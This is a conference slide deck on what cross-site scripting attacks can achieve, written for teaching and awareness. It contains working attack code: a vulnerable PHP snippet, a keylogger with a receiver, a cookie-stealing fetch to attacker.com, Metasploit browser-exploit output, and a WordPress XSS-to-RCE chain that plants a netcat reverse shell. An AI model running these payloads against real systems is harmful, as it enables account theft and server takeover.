XSS
What can be really done with Cross-Site Scripting
For the win!
by @brutelogic
Whoami

- Security Researcher at Sucuri Security (a GoDaddy company)
- XSS, filter/WAF bypass and… bash!
- Helped to fix more than 1000 XSS vulnerabilities in www
- Actually developing/maintaining KNOXSS, an online XSS tool
Agenda

● Fast Intro to XSS
● Dangers of XSS
  ○ Virtual Defacement
  ○ LSD - Leakage, Spying and Deceiving
  ○ Account Stealing
  ○ Memory Corruption Vector
  ○ XSS Worm
  ○ CMS Pwnage
● Miscellaneous
Fast Intro to XSS

Definition

- XSS is javascript code executed by attacker in victim’s browser
- Browsers use a programmatic (object oriented) model of HTML documents called DOM (Document Object Model) where every markup element is a DOM node.
- Almost anything done in browser is performed only or also by javascript
Fast Intro to XSS

Classical Example

- Vulnerable PHP Source Code

```php
$username = $_GET["user"];
echo "<h1>Hello, $username!</h1>";
```
Fast Intro to XSS

Classical Example

- Reflection of User Controlled Input “John”
Fast Intro to XSS

Classical Example

- Execution of Script Block via User Input
Fast Intro to XSS

Main Types

- Server based: attack comes in server’s response (99.99% in source code), directly with input (reflected) or indirectly with a previously saved input (stored);

- Client based: rogue input is treated by native javascript code of the page and gets executed directly or indirectly in the same way as above. Aka DOM-based XSS.
Dangers of XSS

ONE DOES NOT SIMPLY
KEEP POPPING ALERT BOXES
Let’s take the blue pill.
Virtual Defacement

- XSS that alters the visual of the page for the victim, spreading attacker’s message or fake news
- Might impact business or influence someone’s decision (like buy/sell of stocks or btc)
Simple defacement injection

<img src="//attacker.com/picture.jpg" style="width:100%;height:100%"/>
“Loss! Hacker known as ‘Brute Logic’ steals a fortune from Globo’s journalist”
(headline)
Targeted code

<iframe

onload="parent.frames[0].document.getElementsByTagName('h1')[1].innerHTML='Prejuízo! Hacker conhecido como 'Brute Logic' rouba verdadeira fortuna de jornalista global"

style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"

src="/www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-rouba-verdadeira-fortuna-de-jornalista-global.html">
LSD

Leakage, Spying and Deceiving

Trust no one.
LSD - Leakage, Spying and Deceiving

- Leakage: any private info accessible by js is easily exfiltrated

- Spying: what victim type can be logged and sent anywhere

- Deceiving: by presenting a fake login form, victim’s credentials are taken
XSS Keylogger

`$ cat k.js`

```javascript
keys = "";

document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

setInterval(function(){
    new Image().src = '//localhost/keylogger/k.php?k=' + keys;
    keys = "";
}, 1000);
```

`$ cat k.php`

```php
<?php
$k = $_GET['k'];

if (!empty($k)) {
    $f = fopen("log.txt", "a+");
    fwrite($f, $k);
    fclose($f);
}
```
Keylogging with XSS
My another account is your account.
Account Stealing

- Session cookies can be exfiltrated (except httpOnly ones)
- Unprotected password/email/phone number change functionality can be abused to compromise account
Short js code to steal cookies:

```javascript
fetch('http://attacker.com/?cookie=' + document.cookie)
```
Unprotected password change in wordpress.com
Welcome to my box.
Memory Corruption Vector

- By simply firing a request to a server with an exploit, an attacker can compromise the underlying machine of the victim.
Metasploit Browser Autopwn 2 loaded

<table>
<thead>
<tr>
<th>Order</th>
<th>Rank</th>
<th>Name</th>
<th>Payload</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Excellent</td>
<td>firefox_proto_crmfrequest</td>
<td>firefox/shell reverse_tcp on 4442</td>
</tr>
<tr>
<td>2</td>
<td>Excellent</td>
<td>firefox_svg_plugin</td>
<td>firefox/shell reverse_tcp on 4442</td>
</tr>
<tr>
<td>3</td>
<td>Excellent</td>
<td>firefox_tostring_console_injection</td>
<td>firefox/shell reverse_tcp on 4442</td>
</tr>
<tr>
<td>4</td>
<td>Excellent</td>
<td>firefox_webidl_injection</td>
<td>firefox/shell reverse_tcp on 4442</td>
</tr>
<tr>
<td>5</td>
<td>Excellent</td>
<td>webview_addjavascriptinterface</td>
<td>android/meterpreter/reverse_tcp on 4443</td>
</tr>
<tr>
<td>6</td>
<td>Excellent</td>
<td>samsung_knox_smdm_url</td>
<td>android/meterpreter/reverse_tcp on 4443</td>
</tr>
<tr>
<td>7</td>
<td>Great</td>
<td>adobe_flash_domain_memory_uaf</td>
<td>windows/meterpreter/reverse_tcp on 4444</td>
</tr>
<tr>
<td>8</td>
<td>Great</td>
<td>adobe_flash_cas132_int_overflow</td>
<td>windows/meterpreter/reverse_tcp on 4444</td>
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<tr>
<td>9</td>
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<td>adobe_flash_worker_byte_array_uaf</td>
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<td>10</td>
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<td>windows/meterpreter/reverse_tcp on 4444</td>
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<td>11</td>
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<td>adobe_flash_nellymoser_bof</td>
<td>windows/meterpreter/reverse_tcp on 4444</td>
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<td>13</td>
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<td>windows/meterpreter/reverse_tcp on 4444</td>
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<tr>
<td>21</td>
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<td>adobe_flash_unpackcompress_zlib_uninitialized</td>
<td>windows/meterpreter/reverse_tcp on 4444</td>
</tr>
</tbody>
</table>

Please use the following URL for the browser attack:
* BrowserAutoPwn URL: http://192.168.0.186:8000/p7IDZX3U

[*] Server started.
[*] Starting the payload handler...

```
msf auxiliary(browser_autopwn2) >
```
Unleashing the Metasploit beast:

<img src='//attacker.com'>
XSS is my hero.
XSS Worm

- Rogue js code can spread itself across the database of web app

- Exponential growth in social apps, possibility of total compromise
XSS Worm

- An worm in action can be seen here (lab experiment)
Hey admin, give me admin!
CMS Pwnage

- If an administrator of a CMS install gets XSSed, RCE is straightforward
- Get the anti-CSRF token then submit with it to edit or upload code to server
Usage of content management systems for websites

This diagram shows the percentages of websites using various content management systems. See technologies overview for explanations on the methodologies used in the surveys. Our reports are updated daily.

How to read the diagram:
52.2% of the websites use none of the content management systems that we monitor.
WordPress is used by 28.3% of all the websites, that is a content management system market share of 59.2%.

<table>
<thead>
<tr>
<th>System</th>
<th>Percentage</th>
</tr>
</thead>
<tbody>
<tr>
<td>None</td>
<td>52.2%</td>
</tr>
<tr>
<td>WordPress</td>
<td>28.3%</td>
</tr>
<tr>
<td>Joomla</td>
<td>6.9%</td>
</tr>
<tr>
<td>Drupal</td>
<td>4.7%</td>
</tr>
</tbody>
</table>
Wordpress 4.8 - XSS to RCE

- Targeting Hello Dolly plugin, vanilla install
- 200 OK for /wordpress/wp-content/plugins/hello.php
Wordpress 4.8 - XSS to RCE

- Defining some vars (path, file and payload)

```javascript
p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
s = '<?=`nc attacker.com 5855 -e /bin/bash`;'; // reverse shell to attacker.com:5855
```
Wordpress 4.8 - XSS to RCE

- Grabbing anti-CSRF token (_wpnonce) and preparing content update

```javascript
a = new XMLHttpRequest();
a.open('GET', p+q, 0);
a.send();

$ = '_wpnonce=' + /nonce" value="([\^]*?)"/.exec(a.responseText)[1] + '&newcontent=' + s + '&action=update&' + q;
```
Wordpress 4.8 - XSS to RCE

- Submitting plugin edition

```javascript
b = new XMLHttpRequest();
b.open('POST', p+q, 1);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
```
Wordpress 4.8 - XSS to RCE

- Executing payload by firing a request

```javascript
b.onreadystatechange = function(){
  if (this.readyState == 4) {
    fetch('/wordpress/wp-content/plugins/hello.php');
  }
}
```
Opening a netcat shell after triggering a stored XSS in WP
Miscellaneous

- Less Dangerous Outcomes

1. Forced download of files
2. Denial of Service
3. Attacks in mobile or with user permission (geolocation, audio/video capture, plugin install, etc)
Miscellaneous

- Easiness of XSS Delivery
  1. Easily shared in social networks
  2. Disguised by URL shortening services
  3. Spam, spear phishing and watering hole
Miscellaneous

- References

http://brutelogic.com.br/blog

http://brutelogic.com.br/cheatsheet

https://youtu.be/i8mTYicEQRl

https://youtu.be/26V01iIjeGk
“Hackers only need to be lucky once. You need to be lucky every time.”

Rodolfo Assis (@brutelogic), Security Researcher

leakwatch
Thank You!

#hack2learn